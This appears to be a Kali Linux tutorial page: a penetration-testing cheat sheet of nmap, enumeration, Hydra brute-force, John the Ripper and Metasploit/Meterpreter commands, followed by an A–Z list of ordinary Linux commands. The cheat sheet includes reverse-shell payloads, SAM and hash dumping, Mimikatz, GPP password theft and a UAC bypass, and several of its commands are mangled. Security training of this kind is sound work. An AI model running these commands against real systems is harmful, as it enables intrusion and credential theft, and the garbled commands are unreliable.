Kali linux tutorials

Pub Date: 2023-07-31

NMAP Commands

Nmap (“Network Mapper”) is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

Also Read- NMAP Commands Cheatsheet

Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.

Command Description

  • nmap -v -sS -A -T4 target Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
  • nmap -v -sS -p–A -T4 target – As above but scans all TCP ports (takes a lot longer)
  • nmap -v -sU -sS -p- -A -T4 target- As above but scans all TCP ports and UDP scan (takes even longer)
  • nmap -v -p 445 –script=smb-check-vulns–script-args=unsafe=1 192.168.1.X- Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover
  • ls /usr/share/nmap/scripts/ | grep ftp-* Search nmap scripts for keywords

SMB enumeration

In computer networking, Server Message Block (SMB), one version of which was also known as Common Internet File System (CIFS), operates as an application-layer network protocol mainly used for providing shared access to files, printers, and serial ports and miscellaneous communications between nodes on a network

Command Description

  • nbtscan 192.168.1.0/24 – Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
  • enum4linux -a target-ip Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Other Host Discovery

Other methods of host discovery, that don’t use nmap

Command Description

  • netdiscover -r 192.168.1.0/24- Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site

SMB Enumeration

Enumerate Windows shares / Samba shares.

  • nbtscan 192.168.1.0/24- Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
  • enum4linux -a target-ip- Do Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

Python Local Web Server

Python local web server command, handy for serving up shells and exploits on an attacking machine.

  • python -m SimpleHTTPServer 80 Run a basic http server, great for serving up shells etc

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

  • mount 192.168.1.1:/vol/share /mnt/nfs Mount NFS share to /mnt/nfs
  • mount -t cifs -o username=user,password=pass ,domain=blah //192.168.1.X/share-name /mnt/cifs Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
  • net use Z: \win-server\share password /user:domain\janedoe /savecred /p:no Mount a Windows share on Windows from the command line
  • apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing SMB shares

Basic FingerPrinting

A device fingerprint or machine fingerprint or browser fingerprint is information collected about a remote computing device for the purpose of identification. Fingerprints can be used to fully or partially identify individual users or devices even when cookies are turned off.

nc -v 192.168.1.1 25
telnet 192.168.1.1 25 - Basic versioning / fingerprinting via displayed banner

SNMP Enumeration

SNMP enumeration is the process of using SNMP to enumerate user accounts on a target system. SNMP employs two major types of software components for communication: the SNMP agent, which is located on the networking device, and the SNMP management station, which communicates with the agent.

snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

DNS Zone Transfers

  • nslookup -> set type=any -> ls -d blah.com Windows DNS zone transfer
  • dig axfr blah.com @ns1.blah.com Linux DNS zone transfer

DNSRecon

DNSRecon provides the ability to perform:

  1. Check all NS Records for Zone Transfers
  2. Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
  3. Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
  4. Check for Wildcard Resolution
  5. Brute Force subdomain and host A and AAAA records given a domain and a wordlist
  6. Perform a PTR Record lookup for a given IP Range or CIDR
  7. Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
  8. Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google
DNS Enumeration Kali - DNSReconroot:~#
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

HTTP / HTTPS Webserver Enumeration

  • nikto -h 192.168.1.1 Perform a nikto scan against target
  • dirbuster Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

  • tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX-

Description- Enumerate users from SMB

  • ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB /

Description- enumerate users from SMB

SNMP User Enumeration

  • snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25|cut -d” “ -f4 –

Description- Enmerate users from SNMP

  • python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX

Description- Enmerate users from SNMP

  • nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt(then grep)

Description- Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

  • /usr/share/wordlists     –  Linux word lists

Brute Forcing Services

Hydra FTP Brute Force

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the synaptic package manager. On Kali Linux, it is per-installed.

  • hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V Hydra FTP brute force

Hydra POP3 Brute Force

  • hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX pop3 -V Hydra POP3 brute force

Hydra SMTP Brute Force

hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute force Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked.

Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered.

  • john –wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
  • john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt JTR forced descrypt cracking with wordlist
  • john –format=descrypt hash –show JTR forced descrypt brute force cracking

Also Read- Metasploit Commands Cheatsheet

Meterpreter Payloads

  • Windows reverse meterpreter payload set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

  • Windows VNC Meterpreter payload

    set payload windows/vncinject/reverse_tcp
    
    set ViewOnly false
    
Linux Reverse Meterpreter payload

set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

  • upload file c:\windows Meterpreter upload file to Windows target
  • download c:\windows\repair\sam /tmp Meterpreter download file from Windows target
  • download c:\windows\repair\sam /tmp Meterpreter download file from Windows target
  • execute -f c:\windows\temp\exploit.exe Meterpreter run .exe on target – handy for executing uploaded exploits
  • execute -f cmd -c Creates new channel with cmd shell
  • ps Meterpreter show processes
  • shell Meterpreter get shell on the target
  • getsystem Meterpreter attempts priviledge escalation the target
  • hashdump Meterpreter attempts to dump the hashes on the target
  • portfwd add –l 3389 –p 3389 –r target Meterpreter create port forward to target machine
  • portfwd delete –l 3389 –p 3389 –r target Meterpreter delete port forward

Common Metasploit Modules

Local Windows Metasploit Modules (exploits)

use exploit/windows/local/bypassuac- Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

  • use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
  • use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
  • use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
  • use auxiliary/scanner/mysql/mysql_version Metasploit MSSQL Version Scanner
  • use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

  • use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
  • post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a session
  • use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
  • use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

  • run post/windows/gather/win_privs Metasploit show privileges of current user
  • use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
  • load mimikatz -> wdigest Metasplit load Mimikatz
  • run post/windows/gather/local_admin_search_enum Identify other machines that the supplied domain user has administrative access to

Amap

The first next-generation scanning tool for pentesters. It attempts to identify applications even if they are running on a different port than normal.

It also identifies non-ascii based applications. This is achieved by sending trigger packets, and looking up the responses in a list of response strings.

root@kali:~# amap -bqv 192.168.1.15 80
Using trigger file /etc/amap/appdefs.trig ... loaded 30 triggers
Using response file /etc/amap/appdefs.resp ... loaded 346 responses
Using trigger file /etc/amap/appdefs.rpc ... loaded 450 triggers

amap v5.4 (www.thc.org/thc-amap) started at 2014-05-13 19:07:16 - APPLICATION MAPPING mode
Total amount of tasks to perform in plain connect mode: 23

Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http – banner: <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>\n<html><head>\n<title>501 Method Not Implemented</title>\n</head><body>\n<h1>Method Not Implemented</h1>\n<p> to /index.html not supported.<br />\n</p>\n<hr>\n<address>Apache/2.2.22 (Debian) Server at 12
Protocol on 192.168.1.15:80/tcp (by trigger ssl) matches http-apache-2 – banner: <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”>\n<html><head>\n<title>501 Method Not Implemented</title>\n</head><body>\n<h1>Method Not Implemented</h1>\n<p> to /index.html not supported.<br />\n</p>\n<hr>\n<address>Apache/2.2.22 (Debian) Server at 12
Waiting for timeout on 19 connections …

amap v5.4 finished at 2014-05-13 19:07:22

Maltego

Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.

root@kali:~# cat /opt/Teeth/README.txt
NB NB: This runs on Kali Linux
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
#Make directory /opt/Teeth/
#Copy tgz to /opt/Teeth/
#Untar

Load the config file called /opt/Teeth/etc/Maltego_config.mtz file into Maltego.

Also See: How To Run Maltego?

This is painless:

  1. Open Maltego Tungsten (or Radium)
  2. Click top left globe/sphere (Application button)
  3. Import -> Import configuration, choose /opt/Teeth/etc/Maltego_config.mtz

Notes ——— Config file is in /opt/Teeth/etc/TeethConfig.txt Everything can be set in the config file.

Log file is /var/log/Teeth.log, tail -f it while you running transforms for real time logs of what’s happening.

You can set DEBUG/INFO. DEBUG is useful for seeing progress – set in /opt/Teeth/units/TeethLib.py line 26

Look in cache/ directory. Here you find caches of:

  1. Nmap results
  2. Mirrors
  3. SQLMAP results

You need to remove cache files by hand if you no longer want them. You can run housekeep/clear_cache.sh but it removes EVERYTHING.

The WP brute transform uses Metasploit.Start Metasploit server so:

msfconsole -r /opt/Teeth/static/Teeth-MSF.rc

It takes a while to start, so be patient.

In /housekeep is killswitch.sh – it’s the same as kill all python.


Crackle

Crackle exploits a flaw in the BLE pairing process that allows an attacker to guess or very quickly brute force the TK (Temporary Key). With the TK and other data collected from the pairing process, the STK (Short Term Key) and later the LTK (Long Term Key) can be collected.

With the STK and LTK, all communications between the master and the slave can be decrypted.

root@kali:~# crackle -i ltk_exchange.pcap -o ltk-decrypted.pcap

!!! TK found: 000000 ding ding ding, using a TK of 0! Just Cracks(tm) !!!

Warning: packet is too short to be encrypted (1), skipping LTK found: 7f62c053f104a5bbe68b1d896a2ed49c Done, processed 712 total packets, decrypted 3

A-Z LINUX COMMANDS

a apropos : Search Help manual pages (man -k) apt-get : Search for and install software packages (Debian) aptitude : Search for and install software packages (Debian) aspell : Spell Checker awk : Find and Replace text, database sort/validate/index

b basename : Strip directory and suffix from filenames bash : GNU Bourne-Again SHell bc : Arbitrary precision calculator language bg : Send to background break : Exit from a loop builtin : Run a shell builtin bzip2 : Compress or decompress named file(s)

c cal : Display a calendar case : Conditionally perform a command cat : Concatenate and print (display) the content of files cd : Change Directory cfdisk : Partition table manipulator for Linux chgrp : Change group ownership chmod : Change access permissions chown : Change file owner and group chroot : Run a command with a different root directory chkconfig : System services (runlevel) cksum : Print CRC checksum and byte counts clear : Clear terminal screen cmp : Compare two files comm : Compare two sorted files line by line command : Run a command – ignoring shell functions continue : Resume the next iteration of a loop cp : Copy one or more files to another location cron : Daemon to execute scheduled commands crontab : Schedule a command to run at a later time csplit : Split a file into context-determined pieces cut : Divide a file into several parts

d date : Display or change the date & time dc : Desk Calculator dd : Convert and copy a file, write disk headers, boot records ddrescue : Data recovery tool declare : Declare variables and give them attributes df : Display free disk space diff : Display the differences between two files diff3 : Show differences among three files dig : DNS lookup dir : Briefly list directory contents dircolors : Colour setup for `ls’ dirname : Convert a full pathname to just a path dirs : Display list of remembered directories dmesg : Print kernel & driver messages du : Estimate file space usage

e echo : Display message on screen egrep : Search file(s) for lines that match an extended expression eject : Eject removable media enable : Enable and disable builtin shell commands env : Environment variables ethtool : Ethernet card settings eval : Evaluate several commands/arguments exec : Execute a command exit : Exit the shell expect : Automate arbitrary applications accessed over a terminal expand : Convert tabs to spaces export : Set an environment variable expr : Evaluate expressions

f false : Do nothing, unsuccessfully fdformat : Low-level format a floppy disk fdisk : Partition table manipulator for Linux fg : Send job to foreground fgrep : Search file(s) for lines that match a fixed string file : Determine file type find : Search for files that meet a desired criteria fmt : Reformat paragraph text fold : Wrap text to fit a specified width. for : Expand words, and execute commands format : Format disks or tapes free : Display memory usage fsck : File system consistency check and repair ftp : File Transfer Protocol function : Define Function Macros fuser : Identify/kill the process that is accessing a file

g gawk : Find and Replace text within file(s) getopts : Parse positional parameters grep : Search file(s) for lines that match a given pattern groupadd : Add a user security group groupdel : Delete a group groupmod : Modify a group groups : Print group names a user is in gzip : Compress or decompress named file(s)

h hash : Remember the full pathname of a name argument head : Output the first part of file(s) help : Display help for a built-in command history : Command History hostname : Print or set system name

i iconv : Convert the character set of a file id : Print user and group id’s if : Conditionally perform a command ifconfig : Configure a network interface ifdown : Stop a network interface ifup Start a network interface up import : Capture an X server screen and save the image to file install : Copy files and set attributes

j jobs : List active jobs join : Join lines on a common field

k kill : Stop a process from running killall : Kill processes by name

l less : Display output one screen at a time let : Perform arithmetic on shell variables ln : Create a symbolic link to a file local : Create variables locate : Find files logname : Print current login name logout : Exit a login shell look : Display lines beginning with a given string lpc : Line printer control program lpr : Off line print lprint : Print a file lprintd : Abort a print job lprintq : List the print queue lprm : Remove jobs from the print queue ls : List information about file(s) lsof : List open files

m make : Recompile a group of programs man : Help manual mkdir : Create new folder(s) mkfifo : Make FIFOs (named pipes) mkisofs : Create an hybrid ISO9660/JOLIET/HFS filesystem mknod : Make block or character special files more : Display output one screen at a time mount : Mount a file system mtools : Manipulate MS-DOS files mtr : Network diagnostics (traceroute/ping) mv : Move or rename files or directories mmv : Mass Move and rename (files)

n netstat : Networking information nice : Set the priority of a command or job nl : Number lines and write files nohup : Run a command immune to hangups notify-send : Send desktop notifications nslookup : Query Internet name servers interactively

o open : Open a file in its default application op : Operator access

p passwd : Modify a user password paste : Merge lines of files pathchk : Check file name portability ping : Test a network connection pkill : Stop processes from running popd : Restore the previous value of the current directory pr : Prepare files for printing printcap : Printer capability database printenv : Print environment variables printf : Format and print data ps : Process status pushd : Save and then change the current directory pwd : Print Working Directory

q quota : Display disk usage and limits quotacheck : Scan a file system for disk usage quotactl : Set disk quotas

r ram : ram disk device rcp : Copy files between two machines read : Read a line from standard input readarray : Read from stdin into an array variable readonly : Mark variables/functions as readonly reboot : Reboot the system rename : Rename files renice : Alter priority of running processes remsync : Synchronize remote files via email return : Exit a shell function rev : Reverse lines of a file rm : Remove files rmdir : Remove folder(s) rsync : Remote file copy (Synchronize file trees)

s screen : Multiplex terminal, run remote shells via ssh scp : Secure copy (remote file copy) sdiff : Merge two files interactively sed : Stream Editor select : Accept keyboard input seq : Print numeric sequences set : Manipulate shell variables and functions sftp : Secure File Transfer Program shift : Shift positional parameters shopt : Shell Options shutdown : Shutdown or restart linux sleep : Delay for a specified time slocate : Find files sort : Sort text files source : Run commands from a file `.’ split : Split a file into fixed-size pieces ssh : Secure Shell client (remote login program) strace : Trace system calls and signals su : Substitute user identity sudo : Execute a command as another user sum : Print a checksum for a file suspend : Suspend execution of this shell symlink : Make a new name for a file sync : Synchronize data on disk with memory

t tail : Output the last part of file tar : Tape ARchiver tee : Redirect output to multiple files test : Evaluate a conditional expression time : Measure Program running time times : User and system times touch : Change file timestamps top : List processes running on the system traceroute : Trace Route to Host trap : Run a command when a signal is set(bourne) tr : Translate, squeeze, and/or delete characters true : Do nothing, successfully tsort : Topological sort tty : Print filename of terminal on stdin type : Describe a command

u ulimit : Limit user resources umask : Users file creation mask umount : Unmount a device unalias : Remove an alias uname : Print system information unexpand : Convert spaces to tabs uniq : Uniquify files units : Convert units from one scale to another unset : Remove variable or function names unshar : Unpack shell archive scripts until : Execute commands (until error) uptime : Show uptime useradd : Create new user account userdel : Delete a user account usermod : Modify user account users : List users currently logged in uuencode : Encode a binary file uudecode : Decode a file created by uuencode

v v : Verbosely list directory contents (ls -l -b’) vdir : Verbosely list directory contents (ls -l -b’) vi : Text Editor vmstat : Report virtual memory statistics

w wait : Wait for a process to complete watch: Execute/display a program periodically wc : Print byte, word, and line counts whereis : Search the user’s $path, man pages and source files for a program which : Search the user’s $path for a program file while : Execute commands who : Print all usernames currently logged in whoami : Print the current user id and name (`id -un’) wget : Retrieve web pages or files via HTTP, HTTPS or FTP write : Send a message to another user

x xargs : Execute utility, passing constructed argument list(s) xdg-open : Open a file or URL in the user’s preferred application. yes : Print a string until interrupted.